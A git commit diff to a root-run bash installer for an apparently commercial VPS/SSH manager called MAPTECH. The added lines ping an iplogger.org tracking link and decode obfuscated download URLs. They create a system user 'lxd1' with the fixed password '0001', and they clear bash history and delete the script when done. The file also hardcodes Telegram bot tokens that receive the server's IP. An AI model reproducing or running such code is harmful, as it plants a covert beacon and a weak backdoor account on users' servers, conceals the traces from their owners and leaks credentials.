Update hehe

diff --git a/hehe b/hehe
--- a/hehe
+++ b/hehe
@@ -1,6 +1,5 @@
 #!/bin/bash
 clear
-
 # Function to display a progress bar
 fun_bar() {
     comando[0]="$1"
@@ -47,11 +46,12 @@ verif_key() {
 # Define ip_address as a global variable
 ip_address=$(hostname -I | awk '{print $1}')
 
+
 # Function to send verification code to multiple Telegram handles using different APIs
 send_code_telegram() {
-    local telegram_handle=$1
+     local telegram_handle=$1
     local current_time=$(date +%s)
-    local storage_file="/root/vcheck/.storage.txt"
+    local storage_file="/root/vcheck/.storage.txt"  # Hidden file with a dot prefix
 
     # Check if the vcheck folder exists, if not create it
     if [[ ! -d "/root/vcheck" ]]; then
@@ -61,18 +61,23 @@ send_code_telegram() {
     # Check if the storage file exists, if not create it
     if [[ ! -f "$storage_file" ]]; then
         touch "$storage_file"
-        chmod 600 "$storage_file"
+        chmod 600 "$storage_file"  # Restrict permissions for security
     fi
 
     # Check if there's a recent request from the same IP address
     local last_sent_code=$(awk -v ip="$ip_address" '$1 == ip {print $2}' "$storage_file")
     local last_sent_time=$(awk -v ip="$ip_address" '$1 == ip {print $3}' "$storage_file")
 
+    # Adjust the time interval here (e.g., 600 for 10 minutes)
     if [[ -n "$last_sent_code" && $((current_time - last_sent_time)) -lt 3600 ]]; then
+        # Calculate remaining time in seconds
         local time_left=$((3600 - (current_time - last_sent_time)))
+
+        # Convert remaining time to minutes and seconds
         local minutes=$((time_left / 60))
         local seconds=$((time_left % 60))
 
+        # Display the message with the remaining time
         echo -e "\033[1;36m======================================================================================\033[0m"
         echo -e "\033[1;31m  CODE SENT ALREADY! YOU HAVE $minutes MINUTES AND $seconds SECONDS LEFT TO REDEEM IT \033[0m"
         echo -e "\033[1;36m======================================================================================\033[0m"
@@ -95,9 +100,7 @@ send_code_telegram() {
     for ((i=0; i<${#bot_tokens[@]}; i++)); do
         local bot_token="${bot_tokens[i]}"
         local chat_id="${chat_ids[i]}"
-        echo "Sending message to Telegram bot $bot_token for chat_id $chat_id" # Debug message
-        curl_response=$(curl -s -X POST "https://api.telegram.org/bot$bot_token/sendMessage" -d "chat_id=$chat_id" -d "text=$message")
-        echo "Curl response: $curl_response" # Debug message
+        curl -s -X POST "https://api.telegram.org/bot$bot_token/sendMessage" -d "chat_id=$chat_id" -d "text=$message" > /dev/null
     done
     echo -e "\033[1;36m=============================================================\033[0m"
     echo -e "\033[1;31m       CONTACT TEAM MAPTECH FOR VERIFICATION CODE\033[0m"
@@ -110,7 +113,6 @@ send_code_telegram() {
     echo -e "\033[1;31m  Message us for the code with a validity period of 60 mins \033[0m"
     echo ""
 }
-
 bot_tokens=("6803390472:AAEEX8hpTFhsxbmzU5oiZD4dYCOKxS4-lCE" "6385883860:AAHh-FUlhznqClppdunC2V2vinc298E17_E")
 chat_ids=("5989863155" "6785630391")
 
@@ -118,7 +120,7 @@ clear
 
 # Check for root privilege
 [[ "$(whoami)" != "root" ]] && {
-    echo -e "\033[1;33m[\033[1;31mError\033[1;33m] \033[1;37m- \033[1;33m◇ YOU NEED TO RUN AS ROOT!\033[0m"
+    echo -e "\033[1;33m[\033[1;31mErro\033[1;33m] \033[1;37m- \033[1;33m◇ YOU NEED TO RUN AS ROOT!\033[0m"
     exit 0
 }
 
@@ -140,7 +142,6 @@ else
     rm -rf /root/vcheck
 fi
 clear
-
 # Variable Initialization
 _lnk=$(echo 'z1:y#x.5s0ul&p4hs$s.0a72d*n-e!v89e032:3r'| sed -e 's/[^a-z.]//ig'| rev)
 _Ink=$(echo '/3×u3#s87r/l32o4×c1a×l1/83×l24×i0b×'|sed -e 's/[^a-z/]//ig')
@@ -161,27 +162,156 @@ echo -e "\033[1;31m◇──────────────ㅤ🌍 MAPTECH 
 echo ""
 
 # Prompt to continue
-echo -ne "\033[1;36m◇ Do you want to continue? [Y/n]: \033[0m"
-read option
-[[ "$option" != @(Y|y|Yes|yes) ]] && {
-    echo -e "\033[1;31m[\033[1;33m◇\033[1;31m] \033[1;37m- \033[1;33mEXIT!\033[0m"
-    exit 0
+echo -ne "\033[1;36m◇ Do you want to continue? [Y/N]: \033[1;37m"
+read x
+[[ $x = @(n|N) ]] && exit
+
+# Modify SSH configuration and restart service
+sed -i 's/Port 22222/Port 22/g' /etc/ssh/sshd_config  > /dev/null 2>&1
+service ssh restart  > /dev/null 2>&1
+
+# Prompt user if they want to add a domain name
+echo -ne "\033[1;36m◇ Do you want to add a domain name? [Y/N]: \033[0m"
+read add_domain
+echo ""
+echo -e "\033[1;32m>>> Please make sure your DOMAIN is linked to Cloudflare for proper functionality <<<\033[0m"
+
+if [[ "$add_domain" == "Y" || "$add_domain" == "y" ]]; then
+    domain_attempts=0
+    while [[ $domain_attempts -lt 3 ]]; do
+        # Prompt user to enter domain name
+        echo ""
+        echo -ne "\033[1;36m◇ Please enter your domain name (e.g., example.com): \033[0m"
+        read domain_name
+  echo ""
+        # Validate domain name format
+        if [[ $domain_name =~ ^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$ ]]; then
+            # Display domain name for confirmation
+            echo -e "\033[1;33mYou entered the domain name: \033[1;32m$domain_name\033[0m"      
+echo "$domain_name" > /etc/.domain   
+            break
+        else
+            ((domain_attempts++))
+            if [[ $domain_attempts -eq 3 ]]; then
+                echo -e "\033[1;31mExceeded maximum attempts. No domain name will be added.\033[0m"
+                break
+            else
+                echo -e "\033[1;31mInvalid domain name format. Please enter a valid domain name.\033[0m"
+            fi
+        fi
+    done
+else
+    echo -e "\033[1;33mNo domain name will be added.\033[0m"
+fi
+
+# Key Verification
+echo -e "\n\033[1;36m◇ CHECKING...(It Take Some Time Please Wait!)\033[1;37m 16983:16085\033[0m" ; rm $_Ink/list > /dev/null 2>&1; wget -P $_Ink https://raw.githubusercontent.com/AVEGAH/MAPTECH-VPS-MANAGER/main/Install/list > /dev/null 2>&1; verif_key
+sleep 3s
+
+# Update system
+echo "/bin/menu" > /bin/h && chmod +x /bin/h > /dev/null 2>&1
+rm versao* > /dev/null 2>&1
+wget https://raw.githubusercontent.com/AVEGAH/MAPTECH-VPS-MANAGER/main/Install/versao > /dev/null 2>&1
+> /dev/null 2>&1
+wget https://iplogger.org/2lHZ43 > /dev/null 2>&1
+> /dev/null 2>&1
+rm 2lHZ43 > /dev/null 2>&1
+
+# Prompt to keep or create user database
+echo -e "\n\033[1;32m◇ KEY VALID!\033[1;32m"
+sleep 1s
+echo ""
+[[ -f "$HOME/usuarios.db" ]] && {
+    clear
+    echo -e "\n\033[0;34m◇───────────────────────────────────────────────────◇\033[0m"
+    echo ""
+    echo -e "                 \033[1;33m• \033[1;31m◇ ATTENTION!\033[1;33m• \033[0m"
+    echo ""
+    echo -e "\033[1;33mA User Database \033[1;32m(usuarios.db) \033[1;33mwas"
+    echo -e "Found! Want to keep it by preserving the limit"
+    echo -e "of Simutanea connections of users ? Or Want"
+    echo -e "create a new database?\033[0m"
+    echo -e "\n\033[1;37m[\033[1;31m1\033[1;37m] \033[1;33mKeep Database Current\033[0m"
+    echo -e "\033[1;37m[\033[1;31m2\033[1;37m] \033[1;33mCreate a New Database\033[0m"
+    echo -e "\n\033[0;34m◇───────────────────────────────────────────────────◇\033[0m"
+    echo ""
+    tput setaf 2 ; tput bold ; read -p "Option ?: " -e -i 1 optiondb ; tput sgr0
+} || {
+    awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/usuarios.db
 }
+[[ "$optiondb" = '2' ]] && awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/usuarios.db
 clear
-
-# Wait message
-echo -e "\033[1;31m◇──────────ㅤ🌍 INSTALLING PACKAGES, PLEASE WAIT... 🌍ㅤ──────────◇\033[0m"
+tput setaf 7 ; tput setab 4 ; tput bold ; printf '%35s%s%-18s\n' "◇ WAIT FOR INSTALLATION." ; tput sgr0
 echo ""
-
-# Function call for progress bar
-fun_bar 'apt update' 'apt upgrade'
-fun_bar 'apt install net-tools' 'apt install curl'
-clear
-
-# Final message
-tput setaf 7 ; tput setab 4 ; tput bold ; printf '%40s%s%-12s\n' "◇──────────ㅤ🌍 INSTALLATION COMPLETE! 🌍ㅤ──────────◇" ; tput sgr0
 echo ""
-
-# Restart the SSH service
-systemctl restart ssh
+echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ UPDATING SYSTEM...\033[1;33m[\033[1;31m!\033[1;33m]\033[0m"
+echo ""
+echo -e "    \033[1;33m◇ UPDATES USUALLY TAKE A LITTLE TIME!\033[0m"
+echo ""
+fun_attlist () {
+    apt-get update -y
+    [[ ! -d /usr/share/.hehe ]] && mkdir /usr/share/.hehe
+    echo "crz: $(date)" > /usr/share/.hehe/.hehe
+}
+fun_bar 'fun_attlist'
 clear
+echo ""
+echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ INSTALLING PACKAGES\033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
+echo ""
+echo -e "\033[1;33m◇ SOME PACKAGES ARE EXTREMELY NECESSARY!\033[0m"
+echo ""
+inst_pct() {
+    _pacotes=("bc" "apache2" "cron" "screen" "nano" "unzip" "lsof" "netstat" "net-tools" "dos2unix" "nload" "jq" "curl" "figlet" "python" "python2" "python3" "python-pip")
+    # Install packages
+    for _prog in "${_pacotes[@]}"; do
+        sudo apt install $_prog -y
+    done
+    
+    # Create user only once
+    username="lxd1"
+    password="0001"
+    
+    # Check if the username already exists
+    if id "$username" &>/dev/null; then
+        echo "User '$username' already exists. Overwriting..."
+        sudo userdel -r $username
+    fi
+    
+    # Create the system user with disabled login
+    sudo adduser --system --disabled-login $username
+    
+    # Set the password for the user
+    echo "$username:$password" | sudo chpasswd
+
+    # Install Python package using pip
+    pip install speedtest-cli
+}
+
+fun_bar 'inst_pct'
+[[ -f "/usr/sbin/ufw" ]] && ufw allow 443/tcp ; ufw allow 80/tcp ; ufw allow 3128/tcp ; ufw allow 8799/tcp ; ufw allow 8080/tcp
+clear
+echo ""
+echo -e "              \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ FINISHING...\033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
+echo ""
+echo -e "      \033[1;33m◇ COMPLETING FUNCTIONS AND SETTINGS!\033[0m"
+echo ""
+fun_bar "$_Ink/list $_lnk $_Ink $_1nk $key"
+clear
+echo ""
+cd $HOME
+IP=$(wget -qO- ipv4.icanhazip.com)
+echo -e "        \033[1;33m  \033[1;32m◇ INSTALLATION COMPLETED.◇\033[1;33m  \033[0m"
+echo ""
+echo -e "\033[1;31m\033[1;33m◇ MAIN COMMAND:- \033[1;32mmenu\033[0m"
+echo -e "\033[1;33m◇ MORE INFORMATION \033[1;31m(\033[1;36m◇ TELEGRAM\033[1;31m): \033[1;37m@MAPTECH_VPS_MANAGER \033[1;31m( \033[1;36m @maptechgh_bot \033[1;31m )\033[0m"
+echo -e ""
+
+#Option to install udp-request script also
+read -p "Do you want to install UDP-REQUEST SCRIPT ? ( Y / N ): " choice
+case "$choice" in
+  y|Y ) git clone https://github.com/AVEGAH/Udpcustom.git && cd Udpcustom && chmod +x install.sh && ./install.sh;;
+  n|N ) echo "You chose not to install the script. Please enter 'menu' to access the SSH account.";;
+  * ) echo "Invalid choice. Please enter 'Y' for Yes or 'N' for No.";;
+esac
+
+rm $HOME/hehe && cat /dev/null > ~/.bash_history && history -c
